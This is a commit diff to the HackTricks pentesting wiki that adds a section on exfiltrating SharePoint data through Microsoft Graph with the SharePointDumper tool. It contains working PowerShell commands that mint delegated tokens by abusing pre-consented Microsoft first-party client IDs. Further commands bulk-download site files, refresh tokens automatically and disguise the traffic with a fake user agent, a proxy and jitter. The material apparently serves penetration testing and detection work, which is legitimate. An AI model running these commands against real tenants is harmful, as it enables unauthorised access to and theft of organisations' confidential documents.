Merge pull request #251 from HackTricks-wiki/update_SharePointDumper_20260127_014432

carlospolop · web-flow · commit d4b7c719ea8d · 2026-02-12T13:09:08.000+01:00
SharePointDumper
diff --git a/src/pentesting-cloud/azure-security/az-services/az-azuread.md b/src/pentesting-cloud/azure-security/az-services/az-azuread.md
@@ -1176,6 +1176,63 @@ Get-AzureADMSScopedRoleMembership -Id <id> | fl #Get role ID and role members
 {{#endtab }}
 {{#endtabs }}
 
+## Microsoft Graph delegated SharePoint data exfiltration (SharePointDumper)
+
+Attackers with a **delegated Microsoft Graph token** that includes **`Sites.Read.All`** or **`Sites.ReadWrite.All`** can enumerate **sites/drives/items** over Graph and then **pull file contents** via **SharePoint pre-authentication download URLs** (time-limited URLs embedding an access token). The [SharePointDumper](https://github.com/zh54321/SharePointDumper) script automates the full flow (enumeration → pre-auth downloads) and emits per-request telemetry for detection testing.
+
+### Obtaining usable delegated tokens
+
+- SharePointDumper itself **does not authenticate**; supply an access token (optionally refresh token).
+- Pre-consented **first-party clients** can be abused to mint a Graph token without registering an app. Example `Invoke-Auth` (from [EntraTokenAid](https://github.com/zh54321/EntraTokenAid)) invocations:
+
+```powershell
+# CAE requested by default; yields long-lived (~24h) access token
+Import-Module ./EntraTokenAid/EntraTokenAid.psm1
+$tokens = Invoke-Auth -ClientID 'b26aadf8-566f-4478-926f-589f601d9c74' -RedirectUrl 'urn:ietf:wg:oauth:2.0:oob'  # OneDrive (FOCI TRUE)
+
+# Other pre-consented clients
+Invoke-Auth -ClientID '1fec8e78-bce4-4aaf-ab1b-5451cc387264' -RedirectUrl 'https://login.microsoftonline.com/common/oauth2/nativeclient'              # Teams (FOCI TRUE)
+Invoke-Auth -ClientID 'd326c1ce-6cc6-4de2-bebc-4591e5e13ef0' -RedirectUrl 'msauth://code/ms-sharepoint-auth%3A%2F%2Fcom.microsoft.sharepoint'        # SharePoint (FOCI TRUE)
+Invoke-Auth -ClientID '4765445b-32c6-49b0-83e6-1d93765276ca' -RedirectUrl 'https://scuprodprv.www.microsoft365.com/spalanding' -Origin 'https://doesnotmatter' # OfficeHome (FOCI FALSE)
+Invoke-Auth -ClientID '08e18876-6177-487e-b8b5-cf950c1e598c' -RedirectUrl 'https://onedrive.cloud.microsoft/_forms/spfxsinglesignon.aspx' -Origin 'https://doesnotmatter' # SPO Web Extensibility (FOCI FALSE)
+```
+
+> [!NOTE]
+> FOCI TRUE clients support refresh across devices; FOCI FALSE clients often require `-Origin` to satisfy reply URL origin validation.
+
+### Running SharePointDumper for enumeration + exfiltration
+
+- Basic dump with custom UA / proxy / throttling:
+
+```powershell
+.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -UserAgent "Not SharePointDumper" -RequestDelaySeconds 2 -Variation 3 -Proxy 'http://127.0.0.1:8080'
+```
+
+- Scope control: include/exclude sites or extensions and global caps:
+
+```powershell
+.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -IncludeSites 'Finance','Projects' -IncludeExtensions pdf,docx -MaxFiles 500 -MaxTotalSizeMB 100
+```
+
+- **Resume** interrupted runs (re-enumerates but skips downloaded items):
+
+```powershell
+.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -Resume -OutputFolder .\20251121_1551_MyTenant
+```
+
+- **Automatic token refresh on HTTP 401** (requires EntraTokenAid loaded):
+
+```powershell
+Import-Module ./EntraTokenAid/EntraTokenAid.psm1
+.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -RefreshToken $tokens.refresh_token -RefreshClientId 'b26aadf8-566f-4478-926f-589f601d9c74'
+```
+
+Operational notes:
+
+- Prefers **CAE-enabled** tokens to avoid mid-run expiry; refresh attempts are **not** logged in the tool’s API log.
+- Generates **CSV/JSON request logs** for **Graph + SharePoint** and redacts embedded SharePoint download tokens by default (toggleable).
+- Supports **custom User-Agent**, **HTTP proxy**, **per-request delay + jitter**, and **Ctrl+C-safe shutdown** for traffic shaping during detection/IR tests.
+
 ## Entra ID Privilege Escalation
 
 {{#ref}}
@@ -1245,6 +1302,8 @@ The default mode is **Audit**:
 ## References
 
 - [https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units](https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units)
+- [SharePointDumper](https://github.com/zh54321/SharePointDumper)
+- [EntraTokenAid](https://github.com/zh54321/EntraTokenAid)
 
 {{#include ../../../banners/hacktricks-training.md}}
 
